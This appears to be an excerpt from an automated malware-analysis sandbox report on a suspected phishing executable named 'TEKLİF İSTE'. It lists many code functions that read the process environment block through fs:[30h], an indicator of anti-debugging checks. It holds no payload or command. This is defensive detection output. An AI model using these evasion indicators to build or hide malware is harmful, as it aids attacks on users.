          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC035C mov eax, dword ptr fs:[00000030h]4_2_01BC035C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE8350 mov ecx, dword ptr fs:[00000030h]4_2_01BE8350
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC2349 mov eax, dword ptr fs:[00000030h]4_2_01BC2349
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B502A0 mov eax, dword ptr fs:[00000030h]4_2_01B502A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B502A0 mov eax, dword ptr fs:[00000030h]4_2_01B502A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD62A0 mov eax, dword ptr fs:[00000030h]4_2_01BD62A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD62A0 mov ecx, dword ptr fs:[00000030h]4_2_01BD62A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD62A0 mov eax, dword ptr fs:[00000030h]4_2_01BD62A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD62A0 mov eax, dword ptr fs:[00000030h]4_2_01BD62A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD62A0 mov eax, dword ptr fs:[00000030h]4_2_01BD62A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD62A0 mov eax, dword ptr fs:[00000030h]4_2_01BD62A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E284 mov eax, dword ptr fs:[00000030h]4_2_01B7E284
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E284 mov eax, dword ptr fs:[00000030h]4_2_01B7E284
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC0283 mov eax, dword ptr fs:[00000030h]4_2_01BC0283
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC0283 mov eax, dword ptr fs:[00000030h]4_2_01BC0283
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC0283 mov eax, dword ptr fs:[00000030h]4_2_01BC0283
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B502E1 mov eax, dword ptr fs:[00000030h]4_2_01B502E1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B502E1 mov eax, dword ptr fs:[00000030h]4_2_01B502E1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B502E1 mov eax, dword ptr fs:[00000030h]4_2_01B502E1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B4A2C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B4A2C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B4A2C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B4A2C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B4A2C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3823B mov eax, dword ptr fs:[00000030h]4_2_01B3823B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF0274 mov eax, dword ptr fs:[00000030h]4_2_01BF0274
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B44260 mov eax, dword ptr fs:[00000030h]4_2_01B44260
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B44260 mov eax, dword ptr fs:[00000030h]4_2_01B44260
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B44260 mov eax, dword ptr fs:[00000030h]4_2_01B44260
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3826B mov eax, dword ptr fs:[00000030h]4_2_01B3826B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3A250 mov eax, dword ptr fs:[00000030h]4_2_01B3A250
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B46259 mov eax, dword ptr fs:[00000030h]4_2_01B46259
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFA250 mov eax, dword ptr fs:[00000030h]4_2_01BFA250
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFA250 mov eax, dword ptr fs:[00000030h]4_2_01BFA250
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC8243 mov eax, dword ptr fs:[00000030h]4_2_01BC8243
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC8243 mov ecx, dword ptr fs:[00000030h]4_2_01BC8243
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B645B1 mov eax, dword ptr fs:[00000030h]4_2_01B645B1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B645B1 mov eax, dword ptr fs:[00000030h]4_2_01B645B1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC05A7 mov eax, dword ptr fs:[00000030h]4_2_01BC05A7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC05A7 mov eax, dword ptr fs:[00000030h]4_2_01BC05A7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC05A7 mov eax, dword ptr fs:[00000030h]4_2_01BC05A7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E59C mov eax, dword ptr fs:[00000030h]4_2_01B7E59C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B42582 mov eax, dword ptr fs:[00000030h]4_2_01B42582
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B42582 mov ecx, dword ptr fs:[00000030h]4_2_01B42582
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B74588 mov eax, dword ptr fs:[00000030h]4_2_01B74588
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E5E7 mov eax, dword ptr fs:[00000030h]4_2_01B6E5E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B425E0 mov eax, dword ptr fs:[00000030h]4_2_01B425E0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7C5ED mov eax, dword ptr fs:[00000030h]4_2_01B7C5ED
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7C5ED mov eax, dword ptr fs:[00000030h]4_2_01B7C5ED
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B465D0 mov eax, dword ptr fs:[00000030h]4_2_01B465D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A5D0 mov eax, dword ptr fs:[00000030h]4_2_01B7A5D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A5D0 mov eax, dword ptr fs:[00000030h]4_2_01B7A5D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E5CF mov eax, dword ptr fs:[00000030h]4_2_01B7E5CF
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E5CF mov eax, dword ptr fs:[00000030h]4_2_01B7E5CF
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50535 mov eax, dword ptr fs:[00000030h]4_2_01B50535
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50535 mov eax, dword ptr fs:[00000030h]4_2_01B50535
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50535 mov eax, dword ptr fs:[00000030h]4_2_01B50535
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50535 mov eax, dword ptr fs:[00000030h]4_2_01B50535
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50535 mov eax, dword ptr fs:[00000030h]4_2_01B50535
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B50535 mov eax, dword ptr fs:[00000030h]4_2_01B50535
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E53E mov eax, dword ptr fs:[00000030h]4_2_01B6E53E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E53E mov eax, dword ptr fs:[00000030h]4_2_01B6E53E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E53E mov eax, dword ptr fs:[00000030h]4_2_01B6E53E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E53E mov eax, dword ptr fs:[00000030h]4_2_01B6E53E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6E53E mov eax, dword ptr fs:[00000030h]4_2_01B6E53E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BD6500 mov eax, dword ptr fs:[00000030h]4_2_01BD6500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C14500 mov eax, dword ptr fs:[00000030h]4_2_01C14500
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7656A mov eax, dword ptr fs:[00000030h]4_2_01B7656A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7656A mov eax, dword ptr fs:[00000030h]4_2_01B7656A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7656A mov eax, dword ptr fs:[00000030h]4_2_01B7656A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B48550 mov eax, dword ptr fs:[00000030h]4_2_01B48550
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B48550 mov eax, dword ptr fs:[00000030h]4_2_01B48550
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B744B0 mov ecx, dword ptr fs:[00000030h]4_2_01B744B0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCA4B0 mov eax, dword ptr fs:[00000030h]4_2_01BCA4B0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B464AB mov eax, dword ptr fs:[00000030h]4_2_01B464AB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFA49A mov eax, dword ptr fs:[00000030h]4_2_01BFA49A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B404E5 mov ecx, dword ptr fs:[00000030h]4_2_01B404E5
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A430 mov eax, dword ptr fs:[00000030h]4_2_01B7A430
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3E420 mov eax, dword ptr fs:[00000030h]4_2_01B3E420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3E420 mov eax, dword ptr fs:[00000030h]4_2_01B3E420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3E420 mov eax, dword ptr fs:[00000030h]4_2_01B3E420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3C427 mov eax, dword ptr fs:[00000030h]4_2_01B3C427
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC6420 mov eax, dword ptr fs:[00000030h]4_2_01BC6420
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B78402 mov eax, dword ptr fs:[00000030h]4_2_01B78402
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B78402 mov eax, dword ptr fs:[00000030h]4_2_01B78402
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B78402 mov eax, dword ptr fs:[00000030h]4_2_01B78402
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6A470 mov eax, dword ptr fs:[00000030h]4_2_01B6A470
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6A470 mov eax, dword ptr fs:[00000030h]4_2_01B6A470
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6A470 mov eax, dword ptr fs:[00000030h]4_2_01B6A470
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCC460 mov ecx, dword ptr fs:[00000030h]4_2_01BCC460
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFA456 mov eax, dword ptr fs:[00000030h]4_2_01BFA456
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B6245A mov eax, dword ptr fs:[00000030h]4_2_01B6245A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3645D mov eax, dword ptr fs:[00000030h]4_2_01B3645D
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7E443 mov eax, dword ptr fs:[00000030h]4_2_01B7E443
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B407AF mov eax, dword ptr fs:[00000030h]4_2_01B407AF
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BF47A0 mov eax, dword ptr fs:[00000030h]4_2_01BF47A0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE678E mov eax, dword ptr fs:[00000030h]4_2_01BE678E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B447FB mov eax, dword ptr fs:[00000030h]4_2_01B447FB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B447FB mov eax, dword ptr fs:[00000030h]4_2_01B447FB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B627ED mov eax, dword ptr fs:[00000030h]4_2_01B627ED
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B627ED mov eax, dword ptr fs:[00000030h]4_2_01B627ED
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B627ED mov eax, dword ptr fs:[00000030h]4_2_01B627ED
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BCE7E1 mov eax, dword ptr fs:[00000030h]4_2_01BCE7E1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4C7C0 mov eax, dword ptr fs:[00000030h]4_2_01B4C7C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC07C3 mov eax, dword ptr fs:[00000030h]4_2_01BC07C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7273C mov eax, dword ptr fs:[00000030h]4_2_01B7273C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7273C mov ecx, dword ptr fs:[00000030h]4_2_01B7273C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7273C mov eax, dword ptr fs:[00000030h]4_2_01B7273C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BBC730 mov eax, dword ptr fs:[00000030h]4_2_01BBC730
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7C720 mov eax, dword ptr fs:[00000030h]4_2_01B7C720
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7C720 mov eax, dword ptr fs:[00000030h]4_2_01B7C720
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B40710 mov eax, dword ptr fs:[00000030h]4_2_01B40710
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B70710 mov eax, dword ptr fs:[00000030h]4_2_01B70710
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7C700 mov eax, dword ptr fs:[00000030h]4_2_01B7C700
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B48770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B50770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BCE75D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B40750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B82750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BC4755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7674D mov esi, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7674D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B766B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7C6A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B44690 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BBE6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BC06F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7A6C7 mov ebx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7A6C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B5E627 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B76620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B78620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B4262C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B82619 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01C0866E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BBE609 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B5260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B72674 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7A660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B5C640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BC89B3 mov esi, dword ptr fs:[00000030h]
